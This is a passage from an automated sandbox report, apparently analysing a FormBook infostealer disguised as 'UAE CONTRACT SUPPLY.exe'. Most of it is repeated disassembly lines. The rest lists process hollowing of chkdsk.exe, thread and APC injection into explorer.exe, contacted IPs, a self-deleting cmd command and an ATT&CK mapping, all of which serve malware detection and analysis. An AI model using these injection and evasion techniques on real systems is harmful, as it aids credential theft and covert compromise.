      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0577FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736DC9 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E35A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057805AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057805AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056EFD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056EFD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056D746D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0574C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0574C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056EA44B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056EBC2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0578740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0578740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0578740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057714FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05788CD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C849B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056CFF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05788F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056CEF40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B4F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B4F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056EE730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056EA70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056EA70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0574FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0574FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0578070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0578070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DF716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F37F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05737794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05737794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05737794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C8794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0577AE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0577AE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0576FE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056BE620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056BC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056BC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056BC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E8E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056EA61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056EA61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771608 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E16E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C76E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E36CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F8EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05788ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0576FEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057346A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05780EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05780EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05780EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0574FE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056BC962 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056BB171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056BB171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DB944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DB944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056D4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056D4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056D4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056D4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056D4120 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056BB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056BB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056BB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057441E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057351BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057351BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057351BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057351BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E61A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E61A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057749A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057749A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057749A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057749A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057369A6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056EA185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DC182 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E2990 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05772073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05781074 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056D0050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056D0050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056CB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056CB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056CB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056CB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DA830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DA830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DA830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DA830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05737016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05737016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05737016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05784015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05784015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B58EC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B40E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B40E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B40E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0574B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0574B8D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0574B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0574B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0574B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0574B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F90AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056EF0BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056EF0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056EF0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B9080 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05733884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05733884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056BDB60 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E3B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E3B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\explorer.exeNetwork Connect: 185.230.60.102 80
      Source: C:\Windows\explorer.exeNetwork Connect: 104.21.32.11 80
      Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
      Maps a DLL or memory area into another processShow sources
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Modifies the context of a thread in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeThread register set: target process: 3440
      Source: C:\Windows\SysWOW64\chkdsk.exeThread register set: target process: 3440
      Queues an APC in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeThread APC queued: target process: C:\Windows\explorer.exe
      Sample uses process hollowing techniqueShow sources
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeSection unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 1340000
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeProcess created: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe'
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe'
      Source: explorer.exe, 0000000D.00000000.479118102.0000000000EE0000.00000002.00000001.sdmp, chkdsk.exe, 00000010.00000002.634131139.0000000007AB0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 0000000D.00000000.479118102.0000000000EE0000.00000002.00000001.sdmp, chkdsk.exe, 00000010.00000002.634131139.0000000007AB0000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: explorer.exe, 0000000D.00000000.479118102.0000000000EE0000.00000002.00000001.sdmp, chkdsk.exe, 00000010.00000002.634131139.0000000007AB0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
      Source: explorer.exe, 0000000D.00000000.479118102.0000000000EE0000.00000002.00000001.sdmp, chkdsk.exe, 00000010.00000002.634131139.0000000007AB0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02264A17 cpuid

      Stealing of Sensitive Information:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, type: MEMORY
      Yara detected Generic DropperShow sources
      Source: Yara matchFile source: Process Memory Space: chkdsk.exe PID: 392, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: UAE CONTRACT SUPPLY.exe PID: 6952, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsShared Modules1Path InterceptionProcess Injection512Virtualization/Sandbox Evasion21OS Credential DumpingSecurity Software Discovery721Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection512LSASS MemoryVirtualization/Sandbox Evasion21Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsSystem Information Discovery311SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
